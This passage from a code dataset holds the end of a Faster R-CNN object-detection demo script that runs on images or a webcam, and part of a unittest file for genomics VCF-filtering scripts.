dest='cfg_file',\n help='optional config file',\n default='cfgs/vgg16.yml', type=str)\n parser.add_argument('--net', dest='net',\n help='vgg16, res50, res101, res152',\n default='res101', type=str)\n parser.add_argument('--set', dest='set_cfgs',\n help='set config keys', default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument('--load_dir', dest='load_dir',\n help='directory to load models',\n default=\"/srv/share/jyang375/models\")\n parser.add_argument('--image_dir', dest='image_dir',\n help='directory to load images for demo',\n default=\"images\")\n parser.add_argument('--cuda', dest='cuda',\n help='whether use CUDA',\n action='store_true')\n parser.add_argument('--mGPUs', dest='mGPUs',\n help='whether use multiple GPUs',\n action='store_true')\n parser.add_argument('--cag', dest='class_agnostic',\n help='whether perform class_agnostic bbox regression',\n action='store_true')\n parser.add_argument('--parallel_type', dest='parallel_type',\n help='which part of model to parallel, 0: all, 1: model before roi pooling',\n default=0, type=int)\n parser.add_argument('--checksession', dest='checksession',\n help='checksession to load model',\n default=1, type=int)\n parser.add_argument('--checkepoch', dest='checkepoch',\n help='checkepoch to load network',\n default=1, type=int)\n parser.add_argument('--checkpoint', dest='checkpoint',\n help='checkpoint to load network',\n default=10021, type=int)\n parser.add_argument('--bs', dest='batch_size',\n help='batch_size',\n default=1, type=int)\n parser.add_argument('--vis', dest='vis',\n help='visualization mode',\n action='store_true')\n parser.add_argument('--webcam_num', dest='webcam_num',\n help='webcam ID number',\n default=-1, type=int)\n\n args = parser.parse_args()\n return args\n\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\n\ndef _get_image_blob(im):\n \"\"\"Converts an image into a network input.\n Arguments:\n im (ndarray): a color image in BGR order\n Returns:\n blob (ndarray): a data blob holding an image pyramid\n im_scale_factors (list): list of image scales (relative to im) used\n in the image pyramid\n \"\"\"\n im_orig = im.astype(np.float32, copy=True)\n im_orig -= cfg.PIXEL_MEANS\n\n im_shape = im_orig.shape\n im_size_min = np.min(im_shape[0:2])\n im_size_max = np.max(im_shape[0:2])\n\n processed_ims = []\n im_scale_factors = []\n\n for target_size in cfg.TEST.SCALES:\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than MAX_SIZE\n if np.round(im_scale * im_size_max) > cfg.TEST.MAX_SIZE:\n im_scale = float(cfg.TEST.MAX_SIZE) / float(im_size_max)\n im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale_factors.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n blob = im_list_to_blob(processed_ims)\n\n return blob, np.array(im_scale_factors)\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n cfg.USE_GPU_NMS = args.cuda\n\n print('Using config:')\n pprint.pprint(cfg)\n np.random.seed(cfg.RNG_SEED)\n\n # train set\n # -- Note: Use validation set and disable the flipped to enable faster loading.\n\n input_dir = args.load_dir + \"/\" + args.net + \"/\" + args.dataset\n if not os.path.exists(input_dir):\n raise Exception(\n 'There is no input directory for loading network from ' + input_dir)\n load_name = os.path.join(input_dir,\n 'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n\n #pascal_classes = np.asarray(get_categories(\"EconomicBeeHoon_train\"))\n pascal_classes = get_categories('All_train_mt10')\n\n # initilize the network here.\n if args.net == 'vgg16':\n fasterRCNN = vgg16(pascal_classes, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res101':\n fasterRCNN = resnet(pascal_classes, 101, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res50':\n fasterRCNN = resnet(pascal_classes, 50, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res152':\n fasterRCNN = resnet(pascal_classes, 152, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'foodres50':\n fasterRCNN = PreResNet50(pascal_classes, pretrained=False,\n class_agnostic=args.class_agnostic)\n else:\n print(\"network is not defined\")\n pdb.set_trace()\n\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (load_name))\n if args.cuda > 0:\n checkpoint = torch.load(load_name)\n else:\n checkpoint = torch.load(\n load_name, map_location=(lambda storage, loc: storage))\n fasterRCNN.load_state_dict(checkpoint['model'])\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n print('load model successfully!')\n\n # pdb.set_trace()\n\n print(\"load checkpoint %s\" % (load_name))\n\n # initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda > 0:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data, volatile=True)\n im_info = Variable(im_info, volatile=True)\n num_boxes = Variable(num_boxes, volatile=True)\n gt_boxes = Variable(gt_boxes, volatile=True)\n\n if args.cuda > 0:\n cfg.CUDA = True\n\n if args.cuda > 0:\n fasterRCNN.cuda()\n\n fasterRCNN.eval()\n\n start = time.time()\n max_per_image = 100\n thresh = 0.05\n vis = True\n\n webcam_num = args.webcam_num\n # Set up webcam or get image directories\n if webcam_num >= 0:\n cap = cv2.VideoCapture(webcam_num)\n num_images = 0\n else:\n imglist = os.listdir(args.image_dir)\n num_images = len(imglist)\n\n print('Loaded Photo: {} images.'.format(num_images))\n\n while (num_images >= 0):\n total_tic = time.time()\n if webcam_num < 0:\n num_images -= 1\n\n # Get image from the webcam\n if webcam_num >= 0:\n if not cap.isOpened():\n raise RuntimeError(\n \"Webcam could not open. Please check connection.\")\n ret, frame = cap.read()\n im_in = np.array(frame)\n # Load the demo image\n else:\n im_file = os.path.join(args.image_dir, imglist[num_images])\n # im = cv2.imread(im_file)\n im_in = np.array(imread(im_file))\n if len(im_in.shape) == 2:\n im_in = im_in[:, :, np.newaxis]\n im_in = np.concatenate((im_in, im_in, im_in), axis=2)\n # rgb -> bgr\n im = im_in[:, :, ::-1]\n\n blobs, im_scales = _get_image_blob(im)\n assert len(im_scales) == 1, \"Only single-image batch implemented\"\n im_blob = blobs\n im_info_np = np.array(\n [[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)\n\n im_data_pt = torch.from_numpy(im_blob)\n im_data_pt = im_data_pt.permute(0, 3, 1, 2)\n im_info_pt = torch.from_numpy(im_info_np)\n\n im_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)\n im_info.data.resize_(im_info_pt.size()).copy_(im_info_pt)\n gt_boxes.data.resize_(1, 1, 5).zero_()\n num_boxes.data.resize_(1).zero_()\n\n # pdb.set_trace()\n det_tic = time.time()\n\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label = fasterRCNN(im_data, im_info, gt_boxes, num_boxes)\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n if args.cuda > 0:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)\n\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n if args.cuda > 0:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)\n box_deltas = box_deltas.view(\n 1, -1, 4 * len(pascal_classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= im_scales[0]\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n\n # get gt\n # 1. read xml\n\n\n\n\n if vis:\n im2show = np.copy(im)\n for j in xrange(1, len(pascal_classes)):\n inds = torch.nonzero(scores[:, j] > thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:, j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n\n cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)\n # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n cls_dets = cls_dets[order]\n keep = nms(cls_dets, cfg.TEST.NMS,\n force_cpu=not cfg.USE_GPU_NMS)\n cls_dets = cls_dets[keep.view(-1).long()]\n if vis:\n im2show = vis_detections(\n im2show, id2eng[pascal_classes[j]], cls_dets.cpu().numpy(), 0.5)\n\n misc_toc = time.time()\n nms_time = misc_toc - misc_tic\n\n if webcam_num == -1:\n sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s \\r'\n .format(num_images + 1, len(imglist), detect_time, nms_time))\n sys.stdout.flush()\n\n if vis and webcam_num == -1:\n # cv2.imshow('test', im2show)\n # cv2.waitKey(0)\n result_path = os.path.join(\n args.image_dir, imglist[num_images][:-4] + \"_det.jpg\")\n cv2.imwrite(result_path, im2show)\n else:\n #im2showRGB = cv2.cvtColor(im2show, cv2.COLOR_BGR2RGB)\n im2showRGB = im2show\n cv2.namedWindow(\"frame\", 0)\n cv2.resizeWindow(\"frame\", 800, 800)\n cv2.imshow(\"frame\", im2showRGB)\n total_toc = time.time()\n total_time = total_toc - total_tic\n frame_rate = 1 / total_time\n print('Frame rate:', frame_rate)\n if cv2.waitKey(5000) & 0xFF == ord('q'):\n break\n if webcam_num >= 0:\n cap.release()\n cv2.destroyAllWindows()\n"} {"ext": "py", "sha": "1a31482ab1b64d2f5e340b0b5127bb2b142fc900", "content": "\n__author__ = \"Timothy Tickle\"\n__copyright__ = \"Copyright 2015\"\n__credits__ = [ \"Timothy Tickle\", \"Brian Haas\" ]\n__license__ = \"MIT\"\n__maintainer__ = \"Timothy Tickle\"\n__email__ = \"ttickle@broadinstitute.org\"\n__status__ = \"Development\"\n\nimport Commandline\nimport os\nimport ParentPipelineTester\nimport unittest\n\nclass ScriptTester( ParentPipelineTester.ParentPipelineTester ):\n \"\"\"\n Testing for scripts, starting at command line.\n \"\"\"\n str_script_dir = \"src\"\n str_test_data_dir = \"test_data\"\n str_test_data_dir_working = os.path.join( str_test_data_dir, \"active_testing_script_tester\" )\n\n# combine_vchk.py\n def test_combine_vchk_for_1_file( self ):\n \"\"\"\n Test combining VCHK files when only one is given\n \"\"\"\n # Create test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_1_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_1_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_1_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_1_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_combine_vchk_for_2_file( self ):\n \"\"\"\n Test combining VCHK files when two are given\n \"\"\"\n # Create test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_2_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_2_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_2_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_2_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_combine_vchk_for_3_file( self ):\n \"\"\"\n Test combining VCHK files when three are given\n \"\"\"\n # Create test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_3_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_3_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_3_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_3_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# comfirm_maf_mutations.py\n# filter_snps_rna_editing.py\n def test_filter_snps_rna_editing_no_resources( self ):\n \"\"\"\n Test filter_snps_rna_editing with data no resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_no_resources.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_no_resources_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_no_resources.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_darned( self ):\n \"\"\"\n Test filter_snps_rna_editing with data darned resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.vcf\" )\n str_darned_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_darned.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--darned\", str_darned_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_radar( self ):\n \"\"\"\n Test filter_snps_rna_editing with data radar resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.vcf\" )\n str_radar_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_radar.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--radar\", str_radar_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_darned_radar( self ):\n \"\"\"\n Test filter_snps_rna_editing with darned and radar data resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_darned.vcf\" )\n str_radar_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.tab\" )\n str_darned_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_darned_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_radar_darned.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--radar\", str_radar_file, \"--darned\", str_darned_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# filter_variant_clusters.py\n def test_filter_clusters_for_no_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with data that does not need filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_no_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_no_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"35\", \"--cluster\", \"34\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_test_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_clusters_for_all_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with data that will be completely filtered\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_all_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_all_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"1\", \"--cluster\", \"1\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_clusters_for_mild_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with mild filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_mild_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_mild_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"35\", \"--cluster\", \"2\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# filter_vcf_for_cancer.py\n def test_filter_vcf_for_cancer_for_COMMON_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for COMMON features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_COMMON.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_COMMON_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_COMMON.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_DP_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for DP features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_DP.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_DP_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_DP.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_SAO_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for SAO features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_SAO.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_SAO_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_SAO.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_FATHMM_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for FATHMM features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_FATHMM.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_FATHMM_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_FATHMM.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_ALL_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for ALL possible features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_ALL.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_ALL_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_ALL.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = 